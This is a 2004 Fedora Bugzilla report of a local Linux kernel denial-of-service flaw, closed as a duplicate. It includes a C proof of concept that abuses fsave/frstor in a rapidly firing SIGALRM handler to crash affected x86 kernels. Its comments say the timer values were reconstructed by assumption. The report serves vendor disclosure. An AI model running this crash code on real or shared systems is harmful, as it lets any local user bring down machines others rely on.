Bug 125940 - Local kernel denial of service exploit
Summary: Local kernel denial of service exploit
Status: CLOSED DUPLICATE of bug 125912
Alias: None
Product: Fedora
Classification: Fedora
Component: kernel (Show other bugs)
Version: 2
Hardware: All Linux
Target Milestone: ---
Assignee: Arjan van de Ven
QA Contact: Brian Brock
Keywords: Security
Depends On:
Reported: 2004-06-14 13:21 UTC by Nils O. Selåsdal
Modified: 2007-11-30 22:10 UTC (History)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Last Closed: 2006-02-21 19:04:04 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Description Nils O. Selåsdal 2004-06-14 13:21:48 UTC
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040608 Firefox/0.8

Description of problem:
Seems there is a local kernel denial of service exploit in just about
any kernel out there.
Info is at http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
Fedora Core should be updated. RHEL should be investigated.

Version-Release number of selected component (if applicable):

How reproducible:

Steps to Reproduce:
1. compile and run (x86 only; uses the legacy fsave/frstor instructions):
  #include <sys/time.h>
  #include <signal.h>
  #include <unistd.h>
  /* Handler saves and restores the x87 state. fsave waits for any pending
     floating point exception, and on affected kernels the exception raised
     inside the signal handler brings the kernel down rather than the process. */
  static void Handler(int ignore)
  {
    char fpubuf[108];            /* 108 bytes: size of the 32-bit fsave image */
    __asm__ __volatile__ ("fsave %0\n" : "=m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  }
  int main(int argc, char *argv[])
  {
    struct itimerval spec;
    signal(SIGALRM, Handler);
    /* Timer values were lost from the pasted copy; the 1 us initial delay and
       1 us period below are assumed, so SIGALRM fires as often as possible. */
    spec.it_interval.tv_sec = 0;
    spec.it_interval.tv_usec = 1;
    spec.it_value.tv_sec = 0;
    spec.it_value.tv_usec = 1;
    setitimer(ITIMER_REAL, &spec, NULL);
    while (1)                    /* keep running so the handler is entered repeatedly */
      write(1, ".", 1);
    return 0;
  }

Additional info:
Appears that the kernel doesn't handle floating point exceptions in
signal handlers.

Comment 1 Dave Jones 2004-06-14 16:12:55 UTC

*** This bug has been marked as a duplicate of 125912 ***

Comment 2 Red Hat Bugzilla 2006-02-21 19:04:04 UTC
Changed to 'CLOSED' state since 'RESOLVED' has been deprecated.
